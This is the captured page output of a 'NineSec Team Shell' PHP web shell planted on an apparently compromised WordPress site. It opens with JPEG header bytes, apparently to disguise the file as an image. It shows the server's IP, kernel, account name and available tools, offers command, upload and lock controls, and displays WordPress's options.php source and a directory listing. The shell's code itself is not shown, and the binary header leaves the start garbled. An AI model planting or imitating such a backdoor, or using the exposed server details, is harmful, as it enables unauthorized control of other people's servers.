�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/readytorun/Maildir/../public_html/wp-admin/../wp-admin/includes/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/readytorun/Maildir/../public_html/wp-admin/../wp-admin/includes/options.php
<?php
/**
 * WordPress Options Administration API.
 *
 * @package WordPress
 * @subpackage Administration
 * @since 4.4.0
 */

/**
 * Output JavaScript to toggle display of additional settings if avatars are disabled.
 *
 * @since 4.2.0
 */
function options_discussion_add_js() {
	?>
	<script>
	(function($){
		var parent = $( '#show_avatars' ),
			children = $( '.avatar-settings' );
		parent.on( 'change', function(){
			children.toggleClass( 'hide-if-js', ! this.checked );
		});
	})(jQuery);
	</script>
	<?php
}

/**
 * Display JavaScript on the page.
 *
 * @since 3.5.0
 */
function options_general_add_js() {
	?>
<script type="text/javascript">
	jQuery( function($) {
		var $siteName = $( '#wp-admin-bar-site-name' ).children( 'a' ).first(),
			$siteIconPreview = $('#site-icon-preview-site-title'),
			homeURL = ( <?php echo wp_json_encode( get_home_url(), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ); ?> || '' ).replace( /^(https?:\/\/)?(www\.)?/, '' );

		$( '#blogname' ).on( 'input', function() {
			var title = $.trim( $( this ).val() ) || homeURL;

			// Truncate to 40 characters.
			if ( 40 < title.length ) {
				title = title.substring( 0, 40 ) + '\u2026';
			}

			$siteName.text( title );
			$siteIconPreview.text( title );
		});

		$( 'input[name="date_format"]' ).on( 'click', function() {
			if ( 'date_format_custom_radio' !== $(this).attr( 'id' ) )
				$( 'input[name="date_format_custom"]' ).val( $( this ).val() ).closest( 'fieldset' ).find( '.example' ).text( $( this ).parent( 'label' ).children( '.format-i18n' ).text() );
		});

		$( 'input[name="date_format_custom"]' ).on( 'click input', function() {
			$( '#date_format_custom_radio' ).prop( 'checked', true );
		});

		$( 'input[name="time_format"]' ).on( 'click', function() {
			if ( 'time_format_custom_radio' !== $(this).attr( 'id' ) )
				$( 'input[name="time_format_custom"]' ).val( $( this ).val() ).closest( 'fieldset' ).find( '.example' ).text( $( this ).parent( 'label' ).children( '.format-i18n' ).text() );
		});

		$( 'input[name="time_format_custom"]' ).on( 'click input', function() {
			$( '#time_format_custom_radio' ).prop( 'checked', true );
		});

		$( 'input[name="date_format_custom"], input[name="time_format_custom"]' ).on( 'input', function() {
			var format = $( this ),
				fieldset = format.closest( 'fieldset' ),
				example = fieldset.find( '.example' ),
				spinner = fieldset.find( '.spinner' );

			// Debounce the event callback while users are typing.
			clearTimeout( $.data( this, 'timer' ) );
			$( this ).data( 'timer', setTimeout( function() {
				// If custom date is not empty.
				if ( format.val() ) {
					spinner.addClass( 'is-active' );

					$.post( ajaxurl, {
						action: 'date_format_custom' === format.attr( 'name' ) ? 'date_format' : 'time_format',
						date 	: format.val()
					}, function( d ) { spinner.removeClass( 'is-active' ); example.text( d ); } );
				}
			}, 500 ) );
		} );

		var languageSelect = $( '#WPLANG' );
		$( 'form' ).on( 'submit', function() {
			/*
			 * Don't show a spinner for English and installed languages,
			 * as there is nothing to download.
			 */
			if ( ! languageSelect.find( 'option:selected' ).data( 'installed' ) ) {
				$( '#submit', this ).after( '<span class="spinner language-install-spinner is-active" />' );
			}
		});
	} );
</script>
	<?php
}

/**
 * Display JavaScript on the page.
 *
 * @since 3.5.0
 */
function options_reading_add_js() {
	?>
<script type="text/javascript">
	jQuery( function($) {
		var section = $('#front-static-pages'),
			staticPage = section.find('input:radio[value="page"]'),
			selects = section.find('select'),
			check_disabled = function(){
				selects.prop( 'disabled', ! staticPage.prop('checked') );
			};
		check_disabled();
		section.find( 'input:radio' ).on( 'change', check_disabled );
	} );
</script>
	<?php
}

/**
 * Render the site charset setting.
 *
 * @since 3.5.0
 */
function options_reading_blog_charset() {
	echo '<input name="blog_charset" type="text" id="blog_charset" value="' . esc_attr( get_option( 'blog_charset' ) ) . '" class="regular-text" />';
	echo '<p class="description">' . __( 'The <a href="https://wordpress.org/documentation/article/wordpress-glossary/#character-set">character encoding</a> of your site (UTF-8 is recommended)' ) . '</p>';
}

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
December 27 2024 4:51:53
readytorun
0755
admin-filters.php
7.846 KB
April 16 2025 1:08:17
readytorun
0644
admin.php
3.543 KB
November 15 2022 11:08:08
readytorun
0644
ajax-actions.php
148.335 KB
December 03 2025 4:09:51
readytorun
0644
bookmark.php
11.45 KB
April 16 2025 1:08:17
readytorun
0644
class-automatic-upgrader-skin.php
3.577 KB
August 09 2023 12:04:56
readytorun
0644
class-bulk-plugin-upgrader-skin.php
2.529 KB
July 17 2024 12:09:28
readytorun
0644
class-bulk-theme-upgrader-skin.php
2.598 KB
July 17 2024 12:09:28
readytorun
0644
class-bulk-upgrader-skin.php
6.595 KB
July 17 2024 12:09:28
readytorun
0644
class-core-upgrader.php
14.835 KB
November 12 2024 11:09:05
readytorun
0644
class-custom-background.php
21.177 KB
December 03 2025 4:09:51
readytorun
0644
class-custom-image-header.php
48.132 KB
December 03 2025 4:09:51
readytorun
0644
class-file-upload-upgrader.php
4.065 KB
July 17 2024 12:09:28
readytorun
0644
class-ftp-pure.php
5.299 KB
November 25 2021 9:10:13
readytorun
0644
class-ftp-sockets.php
8.28 KB
May 25 2022 12:14:09
readytorun
0644
class-ftp.php
26.729 KB
April 16 2025 1:08:17
readytorun
0644
class-language-pack-upgrader-skin.php
2.803 KB
July 17 2024 12:09:28
readytorun
0644
class-language-pack-upgrader.php
15.196 KB
December 03 2025 4:09:51
readytorun
0644
class-pclzip.php
192.085 KB
April 16 2025 1:08:17
readytorun
0644
class-plugin-installer-skin.php
11.771 KB
November 12 2024 11:09:05
readytorun
0644
class-plugin-upgrader-skin.php
3.201 KB
August 09 2023 12:04:56
readytorun
0644
class-plugin-upgrader.php
22.895 KB
December 03 2025 4:09:51
readytorun
0644
class-theme-installer-skin.php
12.771 KB
December 03 2025 4:09:51
readytorun
0644
class-theme-upgrader-skin.php
4.078 KB
April 03 2024 12:08:17
readytorun
0644
class-theme-upgrader.php
26.273 KB
December 03 2025 4:09:51
readytorun
0644
class-walker-category-checklist.php
4.972 KB
November 12 2024 11:09:05
readytorun
0644
class-walker-nav-menu-checklist.php
5.495 KB
December 03 2025 4:09:51
readytorun
0644
class-walker-nav-menu-edit.php
13.847 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-ajax-upgrader-skin.php
4.095 KB
August 09 2023 12:04:56
readytorun
0644
class-wp-application-passwords-list-table.php
6.786 KB
April 03 2024 12:08:17
readytorun
0644
class-wp-automatic-updater.php
60.451 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-comments-list-table.php
32.352 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-community-events.php
18.243 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-debug-data.php
66.008 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-filesystem-base.php
23.838 KB
April 03 2024 12:08:17
readytorun
0644
class-wp-filesystem-direct.php
17.718 KB
April 03 2024 12:08:17
readytorun
0644
class-wp-filesystem-ftpext.php
22.71 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-filesystem-ftpsockets.php
18.046 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-filesystem-ssh2.php
22.764 KB
April 03 2024 12:08:17
readytorun
0644
class-wp-importer.php
7.336 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-internal-pointers.php
4.508 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-links-list-table.php
9.024 KB
November 12 2024 11:09:05
readytorun
0644
class-wp-list-table-compat.php
1.462 KB
November 25 2021 9:10:13
readytorun
0644
class-wp-list-table.php
51.762 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-media-list-table.php
25.292 KB
April 16 2025 1:08:17
readytorun
0644
class-wp-ms-sites-list-table.php
21.614 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-ms-themes-list-table.php
27.771 KB
April 16 2025 1:08:17
readytorun
0644
class-wp-ms-users-list-table.php
15.351 KB
April 16 2025 1:08:17
readytorun
0644
class-wp-plugin-install-list-table.php
24.538 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-plugins-list-table.php
56.439 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-post-comments-list-table.php
1.419 KB
November 02 2022 11:10:56
readytorun
0644
class-wp-posts-list-table.php
63.662 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-privacy-data-export-requests-list-table.php
5.433 KB
May 25 2022 12:14:09
readytorun
0644
class-wp-privacy-data-removal-requests-list-table.php
5.581 KB
November 07 2023 11:08:17
readytorun
0644
class-wp-privacy-policy-content.php
31.899 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-privacy-requests-table.php
14.444 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-screen.php
36.473 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-site-health-auto-updates.php
14.001 KB
April 16 2025 1:08:17
readytorun
0644
class-wp-site-health.php
121.887 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-site-icon.php
6.264 KB
April 03 2024 12:08:17
readytorun
0644
class-wp-terms-list-table.php
20.734 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-theme-install-list-table.php
15.233 KB
April 16 2025 1:08:17
readytorun
0644
class-wp-themes-list-table.php
10.145 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-upgrader-skin.php
6.943 KB
July 17 2024 12:09:28
readytorun
0644
class-wp-upgrader-skins.php
1.442 KB
November 25 2021 9:10:13
readytorun
0644
class-wp-upgrader.php
46.853 KB
December 03 2025 4:09:51
readytorun
0644
class-wp-users-list-table.php
18.611 KB
April 03 2024 12:08:17
readytorun
0644
comment.php
6.085 KB
December 03 2025 4:09:51
readytorun
0644
continents-cities.php
20.059 KB
November 02 2022 11:10:56
readytorun
0644
credits.php
5.732 KB
April 16 2025 1:08:17
readytorun
0644
dashboard.php
68.181 KB
December 03 2025 4:09:51
readytorun
0644
deprecated.php
40.797 KB
December 03 2025 4:09:51
readytorun
0644
edit-tag-messages.php
1.443 KB
January 25 2022 11:08:17
readytorun
0644
export.php
25.214 KB
December 03 2025 4:09:51
readytorun
0644
file.php
95.84 KB
December 03 2025 4:09:51
readytorun
0644
image-edit.php
43.122 KB
December 03 2025 4:09:51
readytorun
0644
image.php
41.734 KB
December 03 2025 4:09:51
readytorun
0644
import.php
6.462 KB
November 12 2024 11:09:05
readytorun
0644
list-table.php
3.713 KB
November 02 2022 11:10:56
readytorun
0644
media.php
116.309 KB
December 03 2025 4:09:51
readytorun
0644
menu.php
9.393 KB
April 03 2024 12:08:17
readytorun
0644
meta-boxes.php
64.342 KB
December 03 2025 4:09:51
readytorun
0644
misc.php
44.73 KB
December 03 2025 4:09:51
readytorun
0644
ms-admin-filters.php
1.266 KB
November 02 2022 11:10:56
readytorun
0644
ms-deprecated.php
3.682 KB
November 02 2022 11:10:56
readytorun
0644
ms.php
33.532 KB
December 03 2025 4:09:51
readytorun
0644
nav-menu.php
48.845 KB
December 03 2025 4:09:51
readytorun
0644
network.php
26.351 KB
December 03 2025 4:09:51
readytorun
0644
noop.php
1.121 KB
November 07 2023 11:08:17
readytorun
0644
options.php
4.189 KB
December 03 2025 4:09:51
readytorun
0644
plugin-install.php
38.259 KB
December 03 2025 4:09:51
readytorun
0644
plugin.php
91.327 KB
December 03 2025 4:09:51
readytorun
0644
post.php
80.395 KB
December 03 2025 4:09:51
readytorun
0644
privacy-tools.php
32.673 KB
December 03 2025 4:09:51
readytorun
0644
revision.php
16.181 KB
December 03 2025 4:09:51
readytorun
0644
schema.php
44.462 KB
December 03 2025 4:09:51
readytorun
0644
screen.php
6.229 KB
July 17 2024 12:09:28
readytorun
0644
taxonomy.php
8.226 KB
December 03 2025 4:09:51
readytorun
0644
template.php
96.96 KB
December 03 2025 4:09:51
readytorun
0644
theme-install.php
6.826 KB
April 03 2024 12:08:17
readytorun
0644
theme.php
46.623 KB
November 12 2024 11:09:05
readytorun
0644
translation-install.php
10.815 KB
November 12 2024 11:09:05
readytorun
0644
update-core.php
68.823 KB
December 03 2025 4:09:50
readytorun
0644
update.php
33.63 KB
April 16 2025 1:08:17
readytorun
0644
upgrade.php
113.299 KB
December 03 2025 4:09:51
readytorun
0644
user.php
22.98 KB
April 16 2025 1:08:17
readytorun
0644
widgets.php
10.656 KB
November 07 2023 11:08:17
readytorun
0644

NineSec Team - 2022